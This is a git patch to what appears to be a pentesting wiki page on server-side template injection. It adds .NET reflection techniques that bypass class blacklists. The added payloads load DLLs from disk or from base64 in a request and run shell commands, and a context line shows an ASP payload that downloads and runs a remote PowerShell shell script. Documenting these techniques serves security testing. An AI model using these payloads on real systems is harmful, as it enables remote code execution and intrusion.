From 6e063f6cff64484c3fd3a7454175e00f701a10a2 Mon Sep 17 00:00:00 2001 From: cyberzs Date: Sat, 22 Feb 2025 11:30:26 +0100 Subject: [PATCH 1/2] SSTI .NET techniques Added techniques for bypassing restrictions in .NET templates with use of reflection mechanisms. --- .../README.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index 648ca7da6..db4c32fd1 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -1020,6 +1020,25 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` +### .Net Bypassing restrictions + +The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects. + +Dll's can be loaded with: + +- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?"))}` - from filesystem. +- `{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("Load", [typeof(byte[])]).Invoke(null, [Convert.FromBase64String("Base64EncodedDll")])}` - directly from request. + +Full command execution: + +``` +{"a".GetType().Assembly.GetType("System.Reflection.Assembly").GetMethod("LoadFile").Invoke(null, "/path/to/System.Diagnostics.Process.dll".Split("?")).GetType("System.Diagnostics.Process").GetMethods().GetValue(0).Invoke(null, "/bin/bash,-c ""whoami""".Split(","))} +``` + +**More Information** + +- [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/) + **More Information** - [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) From 92e577808990e001f5f497d24a6e638f6d0526a6 Mon Sep 17 00:00:00 2001 From: cyberzs Date: Sat, 22 Feb 2025 11:33:40 +0100 Subject: [PATCH 2/2] Fix wrong placement of text --- .../ssti-server-side-template-injection/README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md index db4c32fd1..fab420745 100644 --- a/src/pentesting-web/ssti-server-side-template-injection/README.md +++ b/src/pentesting-web/ssti-server-side-template-injection/README.md @@ -1020,6 +1020,10 @@ The .NET `System.Diagnostics.Process.Start` method can be used to start any proc <%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %> ``` +**More Information** + +- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) + ### .Net Bypassing restrictions The .NET Reflection mechanisms can be used to bypass blacklisting or classes not being present in the assembly. DLL's can be loaded at runtime with methods and properties accessible from basic objects. @@ -1039,10 +1043,6 @@ Full command execution: - [https://efigo.pl/en/blog/cve-2024-9150/](https://efigo.pl/en/blog/cve-2024-9150/) -**More Information** - -- [https://www.w3schools.com/asp/asp_examples.asp](https://www.w3schools.com/asp/asp_examples.asp) - ### Mojolicious (Perl) Even if it's perl it uses tags like ERB in Ruby.